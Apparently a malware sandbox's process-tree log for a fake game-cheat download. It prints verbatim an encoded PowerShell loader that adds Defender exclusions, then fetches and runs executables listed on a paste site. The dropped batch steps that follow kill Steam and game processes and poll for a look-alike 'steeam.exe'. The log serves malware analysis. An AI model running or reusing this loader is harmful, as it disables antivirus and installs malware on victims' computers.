"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4292

C:\Users\Admin\AppData\Roaming\h1jessfo.kil0.exe
"C:\Users\Admin\AppData\Roaming\h1jessfo.kil0.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:1332

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2231.tmp\2232.tmp\2233.bat C:\Users\Admin\AppData\Roaming\h1jessfo.kil0.exe"
4⤵
PID:3268

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:2340

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:3548

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:4988

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:3248

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:3368

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:3456

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:4436

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:744

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:4980

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:3752

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:512

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:1852

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2888

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:4172

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:448

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2752

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:4992

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:2424

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4708

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:4532

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:4172

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:3484

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:1360

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:4796

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4324

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:1804

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:448

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:3252

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5656

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:5672

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:5832

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:5860

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5268

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5248

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5344

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5324

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:3924

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5536

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5708

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5692

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6016

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6124

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6104

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:2564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4980

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4304

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5444

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5564

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5552

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5544

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5772

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5788

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5680

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5984

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5980

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5996

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:1804

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5328

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:3956

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5700

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5708

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5656

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5976

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6112

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5740

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5724

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5592

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5804

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5148

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2752

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:800

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6392

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6600

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6760

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7028

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6560

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6468

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6948

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6996

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6388

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:508

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6540

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6500

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:1616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5708

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2796

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5832

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6932

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6388

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6024

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6360

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7064

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:4132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:1948

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5344

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6936

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:2084

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6580

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6364

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:1004

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5548

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5128

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4660

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7012

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5716

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6792

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:3544

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5128

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:3724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5548

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4540

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:4976

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6020

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6528

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6452

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7640

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:1568

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7828

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7728

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7796

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6884

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6500

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7172

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7252

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6052

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8112

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7964

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6376

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7880

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:544

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6168

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:1108

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7724

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2612

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6744

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:2624

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7420

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7668

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6744

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5388

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:1108

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7532

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7808

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5700

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:8128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7576

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:8048

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7620

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8112

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6340

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8088

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5676

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7748

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6792

C:\Users\Admin\AppData\Roaming\h1jessfo.kil1.exe
"C:\Users\Admin\AppData\Roaming\h1jessfo.kil1.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3504

C:\Users\Admin\AppData\Roaming\h1jessfo.kil2.exe
"C:\Users\Admin\AppData\Roaming\h1jessfo.kil2.exe"
3⤵
- Executes dropped EXE
PID:4740

C:\Users\Admin\AppData\Roaming\h1jessfo.kil3.exe
"C:\Users\Admin\AppData\Roaming\h1jessfo.kil3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2092

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\22DC.tmp\22DD.tmp\22DE.bat C:\Users\Admin\AppData\Roaming\h1jessfo.kil3.exe"
4⤵
PID:3316

C:\Windows\system32\where.exe
where node
5⤵
PID:2420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4904

C:\Users\Admin\AppData\Local\Temp\Temp1_RedEngine.zip\RedEngine.exe
